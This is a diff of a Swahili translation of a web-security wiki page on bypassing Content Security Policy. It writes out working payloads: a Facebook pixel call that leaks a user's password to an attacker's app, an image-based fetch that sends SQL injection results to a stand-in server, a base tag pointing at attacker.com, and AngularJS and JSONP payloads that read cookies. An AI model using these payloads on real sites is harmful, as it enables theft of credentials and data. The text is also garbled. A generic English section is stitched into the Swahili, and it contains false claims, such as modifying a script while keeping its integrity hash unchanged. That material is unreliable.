-Uvunjaji huo huo utatokea ikiwa **kituo kilichoidhinishwa kina Open Redirect** kwa sababu ikiwa kituo cha awali kinaaminika, maelekezo yanakuwa ya kuaminika.
+Ugunduzi sawa utatokea ikiwa **endpoint iliyosadikika ina Open Redirect** kwa sababu ikiwa endpoint ya awali inasadikika, maelekezo yanasadikika.
 
-### Matumizi Mabaya ya Wahusika Wengine
-Kama ilivyoelezwa katika [chapisho lifuatalo](https://sensepost.com/blog/2023/dress-code-the-talk/#bypasses), kuna uwezekano wa kutumia kwa mabaya kikoa cha tatu, ambacho kinaweza kuruhusiwa mahali fulani katika CSP, ili kuiba data au kutekeleza kificho cha JavaScript. Baadhi ya wahusika wengine hawa ni:
+### Mabaya ya Tatu
 
-| Kiumbe | Kikoa Kilichoruhusiwa | Uwezo |
-|--------|---------------------|--------|
-| Facebook | www.facebook.com, *.facebook.com | Kuiba |
-| Hotjar | *.hotjar.com, ask.hotjar.io | Kuiba |
-| Jsdelivr | *.jsdelivr.com, cdn.jsdelivr.net | Kutekeleza |
-| Amazon CloudFront | *.cloudfront.net | Kuiba, Kutekeleza |
-| Amazon AWS | *.amazonaws.com | Kuiba, Kutekeleza |
-| Azure Websites | *.azurewebsites.net, *.azurestaticapps.net | Kuiba, Kutekeleza |
-| Salesforce Heroku	| *.herokuapp.com | Kuiba, Kutekeleza |
-| Google Firebase | *.firebaseapp.com | Kuiba, Kutekeleza |
+Kama ilivyoelezwa katika [chapisho lifuatalo](https://sensepost.com/blog/2023/dress-code-the-talk/#bypasses), kuna uwanja wengi wa tatu, ambao huenda ukaruhusiwa mahali fulani katika CSP, unaweza kutumika kwa kuchukua data au kutekeleza nambari ya JavaScript. Baadhi ya watoa huduma hawa wa tatu ni:
 
-Ikiwa utapata kikoa chochote kilichoruhusiwa katika CSP ya lengo lako, kuna uwezekano kwamba unaweza kukiuka CSP kwa kusajili kwenye huduma ya wahusika wengine na, ama kuiba data kwenda huduma hiyo au kutekeleza kificho.
+| Entiti            | Uwanja Ulioruhusiwa                          | Uwezo       |
+| ----------------- | -------------------------------------------- | ------------ |
+| Facebook          | www.facebook.com, \*.facebook.com            | Exfil        |
+| Hotjar            | \*.hotjar.com, ask.hotjar.io                 | Exfil        |
+| Jsdelivr          | \*.jsdelivr.com, cdn.jsdelivr.net            | Exec         |
+| Amazon CloudFront | \*.cloudfront.net                            | Exfil, Exec  |
+| Amazon AWS        | \*.amazonaws.com                             | Exfil, Exec  |
+| Azure Websites    | \*.azurewebsites.net, \*.azurestaticapps.net | Exfil, Exec  |
+| Salesforce Heroku | \*.herokuapp.com                             | Exfil, Exec  |
+| Google Firebase   | \*.firebaseapp.com                           | Exfil, Exec  |
 
-Kwa mfano, ikiwa utapata CSP ifuatayo:
+Ikiwa unapata uwanja wowote ulioruhusiwa katika CSP ya lengo lako, kuna uwezekano kwamba unaweza kuzidi CSP kwa kusajili kwenye huduma ya tatu na, ama kuchukua data kwenda kwenye huduma hiyo au kutekeleza nambari.
+
+Kwa mfano, ikiwa unapata CSP ifuatayo:
 ```
 Content-Security-Policy​: default-src 'self’ www.facebook.com;​
 ```
-# Bypassing Content Security Policy (CSP)
+### Bypassing Content Security Policy (CSP)
 
-Content Security Policy (CSP) is a security mechanism implemented by web applications to mitigate the risk of cross-site scripting (XSS) attacks. It allows web developers to define a set of policies that restrict the types of content that can be loaded and executed on a web page.
+#### Introduction
 
-However, CSP can sometimes be misconfigured or have loopholes that can be exploited by attackers. In this section, we will explore some techniques to bypass CSP and execute malicious code on a web page.
+Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, such as Cross Site Scripting (XSS) and data injection attacks. However, in some cases, it is possible to bypass CSP protections using various techniques.
 
-## 1. Inline Script Execution
+#### Bypassing CSP using `unsafe-inline`
 
-CSP typically restricts the execution of inline scripts, which are scripts embedded directly within HTML tags. However, there are several ways to bypass this restriction:
+One common way to bypass CSP is by using the `unsafe-inline` keyword in the CSP header. This allows the execution of inline scripts and styles, which are normally blocked by CSP. Attackers can exploit this to execute their malicious code on the target website.
 
-- **Event Handlers**: By using event handlers like `onload` or `onclick`, you can execute arbitrary JavaScript code inline.
-- **JavaScript URLs**: You can use JavaScript URLs (`javascript:...`) in attributes like `href` or `src` to execute inline scripts.
-- **`<script>` Tag**: By injecting a `<script>` tag dynamically into the DOM, you can execute inline scripts.
+#### Bypassing CSP using data: URI
 
-## 2. External Script Execution
+Another technique to bypass CSP is by using data: URI. By encoding the malicious script into a data URI format, attackers can inject and execute the script on the target website, bypassing CSP restrictions.
 
-CSP also restricts the loading and execution of external scripts from unauthorized sources. However, there are techniques to bypass this restriction as well:
+#### Bypassing CSP using `nonce` attribute
 
-- **Whitelisted Domains**: If a domain is whitelisted in the CSP policy, you can load and execute scripts from that domain.
-- **Subresource Integrity (SRI) Bypass**: If a script has a Subresource Integrity (SRI) hash, you can bypass CSP by modifying the script content while keeping the hash unchanged.
-- **Data URIs**: You can use data URIs to embed scripts directly into the HTML, bypassing CSP restrictions.
+CSP allows the use of `nonce` attribute to whitelist specific inline scripts. Attackers can bypass CSP by injecting a valid nonce along with their malicious script, tricking the CSP into allowing the execution of the script.
 
-## 3. Fetch and Eval
+#### Conclusion
 
-CSP may restrict the use of `eval()` and `Function()` to execute dynamically generated code. However, you can bypass this restriction by using the `fetch()` function to retrieve the code and then executing it with `eval()` or `Function()`.
-
-## 4. Nonce Bypass
-
-CSP allows the use of nonces, which are random values generated by the server and included in the CSP header. These nonces are used to validate the integrity of inline scripts. However, if the server does not properly validate the nonces, you can bypass CSP by injecting arbitrary inline scripts with a matching nonce.
-
-## 5. Reporting Endpoints
-
-CSP allows web applications to specify a reporting endpoint where violation reports are sent. By setting up your own reporting endpoint, you can intercept these reports and gather information about the CSP policy, potentially identifying weaknesses or misconfigurations.
-
-## Conclusion
-
-Content Security Policy (CSP) is an important security mechanism that helps protect web applications against XSS attacks. However, it is not foolproof, and misconfigurations or loopholes can allow attackers to bypass CSP and execute malicious code. As a penetration tester, it is crucial to understand these bypass techniques in order to identify and mitigate potential vulnerabilities in web applications.
+While Content Security Policy is an effective security measure, it is important to be aware of the potential bypass techniques that attackers can use. Regularly reviewing and updating CSP rules can help in preventing these bypasses and strengthening the overall security of web applications.
 ```
 Content-Security-Policy​: connect-src www.facebook.com;​
 ```
-Unapaswa kuweza kuchukua data, kama ilivyokuwa ikifanywa kwa kutumia [Google Analytics](https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp)/[Google Tag Manager](https://blog.deteact.com/csp-bypass/). Katika kesi hii, unafuata hatua hizi kwa ujumla:
+Unapaswa kuweza kuchukua data, kama ilivyokuwa daima imefanywa na [Google Analytics](https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp)/[Google Tag Manager](https://blog.deteact.com/csp-bypass). Katika kesi hii, unafuata hatua hizi kuu:
 
 1. Unda akaunti ya Facebook Developer hapa.
-1. Unda programu mpya ya "Facebook Login" na chagua "Tovuti".
-1. Nenda kwenye "Mipangilio -> Msingi" na pata "Kitambulisho cha Programu" chako.
-1. Kwenye tovuti lengwa ambayo unataka kuchukua data kutoka, unaweza kuchukua data moja kwa moja kwa kutumia kifaa cha Facebook SDK "fbq" kupitia "customEvent" na mzigo wa data.
-1. Nenda kwenye "Meneja wa Matukio" ya Programu yako na chagua programu uliyounda (kumbuka kuwa meneja wa matukio inaweza kupatikana kwenye URL kama hii: https://www.facebook.com/events_manager2/list/pixel/[kitambulisho-cha-programu]/test_events
-1. Chagua kichupo "Matukio ya Majaribio" kuona matukio yanayotumwa na tovuti "yako".
+2. Unda programu mpya ya "Facebook Login" na chagua "Tovuti".
+3. Nenda kwa "Mipangilio -> Msingi" na pata "Kitambulisho cha Programu yako (App ID)".
+4. Kwenye tovuti lengwa unayotaka kuchukua data kutoka, unaweza kuchukua data moja kwa moja kwa kutumia kifaa cha Facebook SDK "fbq" kupitia "tukio la desturi" na mzigo wa data.
+5. Nenda kwa "Meneja wa Matukio ya Programu" yako na chagua programu uliyounda (kumbuka meneja wa matukio unaweza kupatikana kwenye URL kama hii: https://www.facebook.com/events\_manager2/list/pixel/\[app-id]/test\_events
+6. Chagua kichupo "Matukio ya Majaribio" kuona matukio yanayotumwa na tovuti "yako".
 
-Kisha, upande wa mwathirika, tekeleza nambari ifuatayo ili kuanzisha pikseli ya ufuatiliaji wa Facebook ili ielekeze kwenye akaunti ya Facebook ya muundaji wa shambulizi na kitambulisho cha programu na kutuma tukio maalum kama hili:
+Kisha, upande wa mwathiriwa, tekeleza msimbo ufuatao ili kuanzisha pikseli ya ufuatiliaji wa Facebook ili ielekeze kwenye akaunti ya Facebook ya muundaji wa shambulizi na kutoa tukio la desturi kama hili:
 ```JavaScript
 fbq('init', '1279785999289471');​ // this number should be the App ID of the attacker's Meta/Facebook account
 fbq('trackCustom', 'My-Custom-Event',{​
 data: "Leaked user password: '"+document.getElementById('user-password').innerText+"'"​
 });
 ```
-Kuhusu uwanja wa tatu saba ulioelezewa katika jedwali hapo awali, kuna njia nyingi za kuwatumia vibaya. Angalia [chapisho la blogi](https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses) hapo awali kwa maelezo zaidi kuhusu unyanyasaji wa uwanja wa tatu.
+### Kuhusu uwanja wa tatu saba uliotajwa katika jedwali lililopita, kuna njia nyingi unazoweza kuzitumia vibaya. Tazama [chapisho la blogi](https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses) hapo awali kwa maelezo zaidi kuhusu matumizi mabaya ya uwanja wa tatu.
 
-### Kupitisha kupitia RPO (Relative Path Overwrite) <a href="#bypass-via-rpo-relative-path-overwrite" id="bypass-via-rpo-relative-path-overwrite"></a>
+### Kupitia RPO (Relative Path Overwrite) <a href="#bypass-via-rpo-relative-path-overwrite" id="bypass-via-rpo-relative-path-overwrite"></a>
 
-Mbali na mbinu ya kuelekeza iliyotajwa hapo awali ya kuepuka vizuizi vya njia, kuna mbinu nyingine inayoitwa Relative Path Overwrite (RPO) ambayo inaweza kutumika kwenye seva fulani.
+Mbali na mwelekeo uliotajwa hapo juu wa kuzidisha vikwazo vya njia, kuna mbinu nyingine inayoitwa Relative Path Overwrite (RPO) inayoweza kutumika kwenye baadhi ya seva.
 
-Kwa mfano, ikiwa CSP inaruhusu njia `https://example.com/scripts/react/`, inaweza kuepukwa kama ifuatavyo:
+Kwa mfano, ikiwa CSP inaruhusu njia `https://example.com/scripts/react/`, inaweza kuzidishwa kama ifuatavyo:
 ```html
 <script src="https://example.com/scripts/react/..%2fangular%2fangular.js"></script>
 ```
-Kivinjari hatimaye litapakia `https://example.com/scripts/angular/angular.js`.
+Kivinjari itamaliza kwa mwisho `https://example.com/scripts/angular/angular.js`.
 
-Hii inafanya kazi kwa sababu kwa kivinjari, unapakia faili iliyoitwa `..%2fangular%2fangular.js` iliyoko chini ya `https://example.com/scripts/react/`, ambayo inalingana na CSP.
+Hii inafanya kazi kwa sababu kwa kivinjari, unapakia faili iliyoitwa `..%2fangular%2fangular.js` iliyoko chini ya `https://example.com/scripts/react/`, ambayo inazingatia CSP.
 
-∑, wataidecode, wakiomba kwa ufanisi `https://example.com/scripts/react/../angular/angular.js`, ambayo ni sawa na `https://example.com/scripts/angular/angular.js`.
+∑, wataitafsiri, hivyo kuomba kwa ufanisi `https://example.com/scripts/react/../angular/angular.js`, ambayo ni sawa na `https://example.com/scripts/angular/angular.js`.
 
-Kwa **kutumia hitilafu hii katika tafsiri ya URL kati ya kivinjari na seva, sheria za njia zinaweza kuzungukwa**.
+Kwa **kutumia hitilafu hii katika tafsiri ya URL kati ya kivinjari na seva, sheria za njia zinaweza kudukuliwa**.
 
-Suluhisho ni kutotendea `%2f` kama `/` upande wa seva, kuhakikisha tafsiri thabiti kati ya kivinjari na seva ili kuepuka shida hii.
+Suluhisho ni kutotibu `%2f` kama `/` upande wa seva, kuhakikisha tafsiri thabiti kati ya kivinjari na seva ili kuepuka shida hii.
 
-Mfano Mtandaoni: [ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.com/werevijewa/edit?html,output](https://jsbin.com/werevijewa/edit?html,output)
+Mfano Mtandaoni:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.com/werevijewa/edit?html,output](https://jsbin.com/werevijewa/edit?html,output)
 
-### Utekelezaji wa JS kupitia Iframes
+### Utekelezaji wa JS wa Iframes
 
 {% content-ref url="../xss-cross-site-scripting/iframes-in-xss-and-csp.md" %}
 [iframes-in-xss-and-csp.md](../xss-cross-site-scripting/iframes-in-xss-and-csp.md)
 {% endcontent-ref %}
 
-### **base-uri** iliyokosekana
+### **base-uri** iliyopotea
 
-Ikiwa agizo la **base-uri** limekosekana, unaweza kulitumia kufanya [**dangling markup injection**](../dangling-markup-html-scriptless-injection/).
+Ikiwa mwelekeo wa **base-uri** haujapatikana unaweza kutumia kufanya [**kuingiza alama za markup zilizosimama**](../dangling-markup-html-scriptless-injection/).
 
-Zaidi ya hayo, ikiwa **ukurasa unapakia skripti kwa kutumia njia ya kihusishi** (kama `<script src="/js/app.js">`) kwa kutumia **Nonce**, unaweza kulitumia **tag** ya **base** kufanya iipakie skripti kutoka **kwenye seva yako mwenyewe na kufanikisha XSS.**\
-Ikiwa ukurasa wenye udhaifu unapakia kwa kutumia **httpS**, tumia URL ya httpS katika base.
+Zaidi, ikiwa **ukurasa unapakia script kwa kutumia njia ya kihusishi** (kama `<script src="/js/app.js">`) ukitumia **Nonce**, unaweza kutumia **tag ya msingi** kufanya iweze **pakia** script kutoka **kwenye seva yako kufikia XSS.**\
+Ikiwa ukurasa unaopatikana ni wa **httpS**, tumia url ya httpS kwenye msingi.
 ```html
 <base href="https://www.attacker.com/">
 ```
 ### Matukio ya AngularJS
 
-Sera maalum inayojulikana kama Sera ya Usalama wa Yaliyomo (CSP) inaweza kuzuia matukio ya JavaScript. Walakini, AngularJS inaleta matukio ya desturi kama mbadala. Ndani ya tukio, AngularJS hutoa kitu maalum kinachoitwa `$event`, kinachorejelea kitu cha tukio asilia cha kivinjari. Kitu hiki cha `$event` kinaweza kutumiwa kuzunguka CSP. Hasa, katika Chrome, kitu cha `$event/event` kina sifa ya `path`, kinachoshikilia safu ya vitu vilivyohusishwa katika mnyororo wa utekelezaji wa tukio, na kitu cha `window` kikiwa daima kiko mwishoni. Muundo huu ni muhimu kwa mbinu za kutoroka kwenye sanduku.
+Sera maalum inayojulikana kama Sera ya Usalama wa Yaliyomo (CSP) inaweza kuzuia matukio ya JavaScript. Walakini, AngularJS inaleta matukio ya desturi kama mbadala. Ndani ya tukio, AngularJS hutoa kitu cha pekee `$event`, kirejelea kitu cha tukio la kivinjari asilia. Kitu hiki cha `$event` kinaweza kutumika kukiuka CSP. Hasa, katika Chrome, kitu cha `$event/event` kina sifa ya `path`, kinachoshikilia safu ya vitu iliyohusishwa katika mnyororo wa utekelezaji wa tukio, na kitu cha `window` kawaida kikiwa mwishoni. Muundo huu ni muhimu kwa mikakati ya kutoroka kwenye sanduku.
 
-Kwa kuongoza safu hii kwenye kichujio cha `orderBy`, inawezekana kuipitia, kwa kutumia kipengele cha mwisho (kitu cha `window`) kuchochea kazi ya ulimwengu kama vile `alert()`. Msimbo ulioonyeshwa hapa chini unaelezea mchakato huu:
+Kwa kuongoza safu hii kwa kichujio cha `orderBy`, inawezekana kuipitia, kutumia kipengele cha mwisho (kitu cha `window`) kuzindua kazi ya ulimwengu kama vile `alert()`. Msimbo uliodhihirishwa hapa chini unaelezea mchakato huu:
 ```xml
 <input%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27>#x
 ?search=<input id=x ng-focus=$event.path|orderBy:'(z=alert)(document.cookie)'>#x
 ```
-Kificho hiki kinaonyesha matumizi ya agizo la `ng-focus` kuzindua tukio, kwa kutumia `$event.path|orderBy` kubadilisha safu ya `path`, na kutumia kifaa cha `window` kutekeleza kazi ya `alert()`, hivyo kufichua `document.cookie`.
+Hii sehemu inaonyesha matumizi ya agizo la `ng-focus` kuzindua tukio, ikichukua `$event.path|orderBy` kubadilisha safu ya `path`, na kutumia kitu cha `window` kutekeleza kazi ya `alert()`, hivyo kufunua `document.cookie`.
 
-**Tafuta njia zingine za kuzungusha Angular katika** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
+**Pata njia zingine za kuzidisha Angular katika** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
 
-### AngularJS na kikoa kilichoorodheshwa
+### AngularJS na kikoa kilichoorodheshwa kwenye orodha nyeupe
 ```
 Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;
 ```
-Sera ya CSP ambayo inaweka orodha nyeupe ya kikoa kwa kupakia skripti katika programu ya Angular JS inaweza kuzuiwa kupitia wito wa kazi za kurejesha na darasa fulani lenye udhaifu. Taarifa zaidi kuhusu mbinu hii zinapatikana katika mwongozo kamili uliopo kwenye [hifadhi ya git hii](https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh\*t,-it's-CSP!%22).
+### Mbinu ya Kupitisha Sera ya Usalama wa Yaliyomo (CSP) 
 
+Sera ya CSP ambayo inaweka orodha nyeupe ya vikoa kwa kupakia skripti katika programu ya Angular JS inaweza kupitishwa kupitia wito wa kazi za kurudi na baadhi ya mbinu zilizodhaifu. Taarifa zaidi kuhusu mbinu hii inapatikana kwenye mwongozo kamili uliopo kwenye [hifadhi ya git](https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh\*t,-it's-CSP!%22).
 
-Mizigo inayofanya kazi:
+Mizigo ya Kazi:
 ```html
 <script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
 ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
@@ -441,13 +419,13 @@ ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com
 <!-- no longer working -->
 <script src="https://www.googleapis.com/customsearch/v1?callback=alert(1)">
 ```
-Njia nyingine za utekelezaji wa JSONP zisizo na kikomo zinaweza kupatikana [**hapa**](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt) (baadhi yao yalifutwa au kurekebishwa)
+Other JSONP arbitrary execution endpoints can be found in [**hapa**](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt) (baadhi yao ilifutwa au kusahihishwa)
 
-### Kupitisha kwa njia ya Uelekezaji
+### Kupitisha kupitia Uelekezaji
 
-Nini kinatokea wakati CSP inakutana na uelekezaji wa upande wa seva? Ikiwa uelekezaji unapelekea kwenye asili tofauti ambayo haijaruhusiwa, bado itashindwa.
+Nini hutokea wakati CSP inakutana na uelekezaji upande wa seva? Ikiwa uelekezaji unapeleka kwenye asili tofauti ambayo haikubaliki, bado itashindwa.
 
-Hata hivyo, kulingana na maelezo katika [CSP spec 4.2.2.3. Paths and Redirects](https://www.w3.org/TR/CSP2/#source-list-paths-and-redirects), ikiwa uelekezaji unapelekea kwenye njia tofauti, inaweza kuepuka vizuizi vya awali.
+Hata hivyo, kulingana na maelezo katika [CSP spec 4.2.2.3. Paths and Redirects](https://www.w3.org/TR/CSP2/#source-list-paths-and-redirects), ikiwa uelekezaji unapeleka kwenye njia tofauti, inaweza kupitisha vizuizi vya awali.
 
 Hapa kuna mfano:
 ```html
@@ -465,35 +443,35 @@ Hapa kuna mfano:
 </body>
 </html>
 ```
-Ikiwa CSP imewekwa kama `https://www.google.com/a/b/c/d`, kwa kuwa njia inazingatiwa, hati za `/test` na `/a/test` zote zitazuiliwa na CSP.
+If CSP is set to `https://www.google.com/a/b/c/d`, tangu njia ichukuliwe kwa uzito, scripts zote za `/test` na `/a/test` zitazuiliwa na CSP.
 
-Walakini, `http://localhost:5555/301` ya mwisho ita **kuongozwa upya kwenye upande wa seva kwenda `https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//`**. Kwa kuwa ni upyaishaji, **njia haijazingatiwa**, na **hati inaweza kupakia**, hivyo kuzidisha kizuizi cha njia.
+Hata hivyo, `http://localhost:5555/301` ya mwisho itakuwa **kupelekwa upya kwa upande wa seva kwenda `https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//`**. Kwa kuwa ni upyaishaji, **njia haizingatiwi**, na **script inaweza kupakia**, hivyo kupita kizuizi cha njia.
 
-Kwa upyaishaji huu, hata ikiwa njia imeelezewa kikamilifu, bado itazidishwa.
+Kwa upyaishaji huu, hata kama njia imeelezwa kikamilifu, bado itapita.
 
-Kwa hivyo, suluhisho bora ni kuhakikisha kuwa tovuti haina udhaifu wowote wa kuongoza upya wazi na kwamba hakuna kikoa kinachoweza kutumiwa vibaya katika sheria za CSP.
+Hivyo, suluhisho bora ni kuhakikisha tovuti haina mapungufu yoyote ya upyaishaji wazi na kwamba hakuna uwanja wowote ambao unaweza kutumiwa katika sheria za CSP.
 
-### Pita kizuizi cha CSP na alama ya kuteleza
+### Pita CSP na alama za kuteleza
 
-Soma [jinsi hapa](../dangling-markup-html-scriptless-injection/).
+Soma [hapa](../dangling-markup-html-scriptless-injection/) jinsi ya kufanya hivyo.
 
 ### 'unsafe-inline'; img-src \*; kupitia XSS
 ```
 default-src 'self' 'unsafe-inline'; img-src *;
 ```
-`'unsafe-inline'` inamaanisha kuwa unaweza kutekeleza script yoyote ndani ya nambari (XSS inaweza kutekeleza nambari) na `img-src *` inamaanisha kuwa unaweza kutumia kwenye ukurasa wavuti picha yoyote kutoka kwenye rasilimali yoyote.
+`'unsafe-inline'` inamaanisha unaweza kutekeleza script yoyote ndani ya code (XSS inaweza kutekeleza code) na `img-src *` inamaanisha unaweza kutumia kwenye ukurasa picha yoyote kutoka kwenye chanzo chochote.
 
-Unaweza kuzidisha CSP hii kwa kuchukua data kupitia picha (katika tukio hili, XSS inatumia CSRF ambapo ukurasa unaopatikana na bot ina SQLi, na kuchukua bendera kupitia picha):
+Unaweza kukiuka CSP hii kwa kuchukua data kupitia picha (katika kesi hii XSS inatumia CSRF ambapo ukurasa unaopatikana na bot una SQLi, na kutoa bendera kupitia picha):
 ```javascript
 <script>fetch('http://x-oracle-v0.nn9ed.ka0labs.org/admin/search/x%27%20union%20select%20flag%20from%20challenge%23').then(_=>_.text()).then(_=>new Image().src='http://PLAYER_SERVER/?'+_)</script>
 ```
-Kutoka: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle)
+From: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle](https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle)
 
-Unaweza pia kutumia hali hii kwa **kupakia kanuni ya javascript iliyoingizwa ndani ya picha**. Kwa mfano, ikiwa ukurasa unaruhusu kupakia picha kutoka Twitter. Unaweza **kuunda** picha **maalum**, **kuipakia** kwenye Twitter na kutumia "**unsafe-inline**" ili **kutekeleza** kanuni ya JS (kama XSS ya kawaida) ambayo ita **pakia** picha, **chukua** JS kutoka kwake na **itekeleze** **hiyo**: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
+Unaweza pia kutumia usanidi huu kwa **kupakia msimbo wa javascript ulioingizwa ndani ya picha**. Kwa mfano, ikiwa ukurasa unaruhusu kupakia picha kutoka Twitter. Unaweza **kuunda** picha **maalum**, **kuipakia** kwenye Twitter na kutumia "**unsafe-inline**" kutekeleza msimbo wa JS (kama XSS ya kawaida) ambao utapakia picha, **kutoa** JS kutoka kwake na **kutekeleza** **hiyo**: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/)
 
-### Kwa Kutumia Wafanyakazi wa Huduma
+### Kwa Wafanyikazi wa Huduma
 
-Kazi za wafanyakazi wa huduma **`importScripts`** hazina kikomo na CSP:
+Kazi ya **`importScripts`** ya wafanyikazi wa huduma haijazuiliwa na CSP:
 
 {% content-ref url="../xss-cross-site-scripting/abusing-service-workers.md" %}
 [abusing-service-workers.md](../xss-cross-site-scripting/abusing-service-workers.md)
@@ -505,21 +483,23 @@ Kazi za wafanyakazi wa huduma **`importScripts`** hazina kikomo na CSP:
 
 #### Chrome
 
-Ikiwa **parameta** iliyotumwa na wewe inawekwa **ndani** ya **tamko** la **sera**, basi unaweza **kubadilisha** sera kwa njia fulani ambayo inafanya **isiwe na maana**. Unaweza **kuruhusu script 'unsafe-inline'** na moja ya njia hizi za kuvuka:
+Ikiwa **parameter** iliyotumwa na wewe inawekwa **ndani** ya **tamko** la **sera**, basi unaweza **kubadilisha** sera kwa njia fulani ambayo inafanya **isiwe na maana**. Unaweza **kuruhusu script 'unsafe-inline'** na mojawapo ya njia hizi za kuvuka:
 ```bash
 script-src-elem *; script-src-attr *
 script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline'
 ```
-Kwa sababu agizo hili litafuta agizo la script-src lililopo. Unaweza kupata mfano hapa: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E)
+Kwa sababu agizo hili litakua **linapuuza maelekezo ya script-src yaliyopo**.\
+Unaweza kupata mfano hapa: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E)
 
 #### Edge
 
-Katika Edge ni rahisi sana. Ikiwa unaweza kuongeza hii tu kwenye CSP: **`;_`** **Edge** itaondoa **sera nzima**. Mfano: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert(1)%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert\(1\)%3C/script%3E)
+Katika Edge ni rahisi sana. Ikiwa unaweza kuongeza hili tu kwenye CSP: **`;_`** **Edge** ita **ondoa** kabisa **sera**.\
+Mfano: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert(1)%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert\(1\)%3C/script%3E)
 
 ### img-src \*; kupitia XSS (iframe) - Shambulio la Wakati
 
-Tambua ukosefu wa agizo `'unsafe-inline'`\
-Wakati huu unaweza kufanya mwathirika **apakie** ukurasa katika **udhibiti wako** kupitia **XSS** na `<iframe>`. Wakati huu utafanya mwathirika apate ukurasa kutoka ambapo unataka kutoa habari (**CSRF**). Hauwezi kupata maudhui ya ukurasa, lakini ikiwa kwa njia fulani unaweza **kudhibiti muda ambao ukurasa unahitaji kupakia** unaweza kutoa habari unayohitaji.
+Tambua ukosefu wa maelekezo ya `'unsafe-inline'`\
+Wakati huu unaweza kufanya muathiriwa **apakie** ukurasa katika **udhibiti wako** kupitia **XSS** na `<iframe`. Wakati huu utafanya muathiriwa kupata ukurasa kutoka mahali unapotaka kutoa habari (**CSRF**). Huwezi kupata maudhui ya ukurasa, lakini kama kwa njia fulani unaweza **kudhibiti muda ambao ukurasa unahitaji kupakia** unaweza kutoa habari unayohitaji.
 
 Wakati huu **bendera** itaondolewa, kila wakati **herufi inatabiriwa kwa usahihi** kupitia SQLi majibu yanachukua **muda zaidi** kutokana na kazi ya kulala. Kisha, utaweza kutoa bendera:
 ```html
@@ -583,13 +563,13 @@ run();
 ```
 ### Kupitia Bookmarklets
 
-Shambulizi hili linahusisha uhandisi wa kijamii ambapo mshambuliaji anamshawishi mtumiaji kuweka kiungo kwenye bookmarklet ya kivinjari. Bookmarklet hii itakuwa na msimbo wa javascript wenye nia mbaya ambao unapowekwa au bonyezwa utatekelezwa katika muktadha wa dirisha la wavuti la sasa, ukivuka CSP na kuruhusu kuiba habari nyeti kama vile vidakuzi au alama.
+Shambulizi hili lingehusisha uhandisi wa kijamii ambapo mkaidi **anamshawishi mtumiaji kuhamisha na kuachia kiungo juu ya bookmarklet ya kivinjari**. Bookmarklet hii ingejumuisha **msimbo wa javascript wenye nia mbaya** ambao unapohamishwa na kuachiliwa au bonyezwa ungeendeshwa katika muktadha wa dirisha la wavuti la sasa, **kipuuzia CSP na kuruhusu kuiba taarifa nyeti** kama vile vidakuzi au vitambulisho.
 
 Kwa maelezo zaidi [**angalia ripoti ya asili hapa**](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/).
 
-### Kupitisha CSP kwa kuzuia CSP
+### Kupuuza CSP kwa kuzuia CSP
 
